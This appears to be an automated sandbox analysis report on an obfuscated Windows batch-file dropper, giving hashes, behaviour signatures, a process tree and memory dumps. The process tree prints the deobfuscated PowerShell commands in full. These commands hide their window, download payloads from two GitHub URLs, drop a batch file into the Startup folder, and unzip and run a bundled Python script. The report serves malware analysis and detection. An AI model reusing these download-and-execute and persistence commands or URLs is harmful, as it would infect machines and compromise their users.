Analysis

  • max time kernel: 119s
  • max time network: 120s
  • platform: windows7_x64
  • resource: win7-20231129-en
  • resource tags: arch:x64, arch:x86, image:win7-20231129-en, locale:en-us, os:windows7-x64, system
  • submitted: 05/06/2024, 14:32

General

  • Target: 462fdb86855a912ee6c9a076c1a6f77973daea97df652cf47310976c7e58b340.bat
  • Size: 28KB
  • MD5: 4bbf7218eb67763078c0a6c9a4d27ee2
  • SHA1: e1a571c79b74cb842071b90e1d6c8407a25e5459
  • SHA256: 462fdb86855a912ee6c9a076c1a6f77973daea97df652cf47310976c7e58b340
  • SHA512: cb1d1c0c279d68ce02122c73d195ec1503cbe347bfb2bbd64cfa5e7108617b21eac96a848ba6ee4109d350458331b3a2f1a2a65c7463db7494ba82ae4761045b
  • SSDEEP: 192:ovUjBvkHo0JHs1VtLX8gY7SoZfTU+yFe7dXTT8dPwQ4gH:ocjJkHohTLX8f7SoZQ+yFe7Jf+PZrH

Score
10/10

Malware Config

  • Extracted
    Language: ps1 (deobfuscated)
    URLs
      exe.dropper: https://github.com/sdvsdv23rbfdb3/kjkj/raw/main/1

  • Extracted
    Language: ps1 (deobfuscated)
    URLs
      exe.dropper: https://github.com/bao3125/Post/raw/main/Document.zip

Signatures

  • Blocklisted process makes network request (4 IoCs)
  • Command and Scripting Interpreter: PowerShell (1 TTPs, 4 IoCs)
    Run Powershell and hide display window.
  • Drops startup file (1 IoCs)
  • Suspicious behavior: EnumeratesProcesses (4 IoCs)
  • Suspicious use of AdjustPrivilegeToken (4 IoCs)
  • Suspicious use of WriteProcessMemory (39 IoCs)

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\462fdb86855a912ee6c9a076c1a6f77973daea97df652cf47310976c7e58b340.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2956
    • C:\Windows\system32\chcp.com
      chcp.com 437
      2⤵
      PID:2412
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c type tmp
      2⤵
      PID:2240
    • C:\Windows\system32\findstr.exe
      findstr /L /I set C:\Users\Admin\AppData\Local\Temp\462fdb86855a912ee6c9a076c1a6f77973daea97df652cf47310976c7e58b340.bat
      2⤵
      PID:3036
    • C:\Windows\system32\findstr.exe
      findstr /L /I goto C:\Users\Admin\AppData\Local\Temp\462fdb86855a912ee6c9a076c1a6f77973daea97df652cf47310976c7e58b340.bat
      2⤵
      PID:3016
    • C:\Windows\system32\findstr.exe
      findstr /L /I echo C:\Users\Admin\AppData\Local\Temp\462fdb86855a912ee6c9a076c1a6f77973daea97df652cf47310976c7e58b340.bat
      2⤵
      PID:2556
    • C:\Windows\system32\findstr.exe
      findstr /L /I pause C:\Users\Admin\AppData\Local\Temp\462fdb86855a912ee6c9a076c1a6f77973daea97df652cf47310976c7e58b340.bat
      2⤵
      PID:2344
    • C:\Windows\system32\find.exe
      fiNd
      2⤵
      PID:2152
    • C:\Windows\system32\find.exe
      fInd
      2⤵
      PID:1420
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c type tmp
      2⤵
      PID:2580
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://github.com/sdvsdv23rbfdb3/kjkj/raw/main/1', 'C:\Users\Admin\AppData\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WindowsSecure.bat')"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Drops startup file
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2576
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://github.com/bao3125/Post/raw/main/Document.zip', 'C:\Users\Public\Document.zip')"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2492
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -WindowStyle Hidden -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document')"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2544
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -WindowStyle Hidden -Command " C:\Users\Public\Document\python.exe C:\Users\Public\Document\Lib\sim.py"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2068

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Temp\tmp
    Filesize: 14B
    MD5: ce585c6ba32ac17652d2345118536f9c
    SHA1: be0e41b3690c42e4c0cdb53d53fc544fb46b758d
    SHA256: 589c942e748ea16dc86923c4391092707ce22315eb01cb85b0988c6762aa0ed3
    SHA512: d397eda475d6853ce5cc28887690ddd5f8891be43767cdb666396580687f901fb6f0cc572afa18bde1468a77e8397812009c954f386c8f69cc0678e1253d5752

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    Filesize: 7KB
    MD5: 19ffe2ac25a39d6099a6696356731921
    SHA1: 48e5afd31cc13e1b252f34beea6bb66a06f6eb5a
    SHA256: 99b7ad6069d7e36ce630f9b949898c642f97b6b4ea36815c0c9fe0d620cea60f
    SHA512: c65908e5d5a5590402a6657275781e70cdbc8ba17209c1bb8a46899a10c1d3d7418b55aff570cd5e554d40044f06aac0ede6f5d8b242915c60eb82ebe2fef61a

  • memory/2492-17-0x000000001B700000-0x000000001B9E2000-memory.dmp
    Filesize: 2.9MB

  • memory/2492-18-0x0000000002820000-0x0000000002828000-memory.dmp
    Filesize: 32KB

  • memory/2576-8-0x0000000002EB0000-0x0000000002F30000-memory.dmp
    Filesize: 512KB

  • memory/2576-9-0x000000001B6F0000-0x000000001B9D2000-memory.dmp
    Filesize: 2.9MB

  • memory/2576-10-0x0000000001D20000-0x0000000001D28000-memory.dmp
    Filesize: 32KB

  • memory/2576-11-0x0000000002EB0000-0x0000000002F30000-memory.dmp
    Filesize: 512KB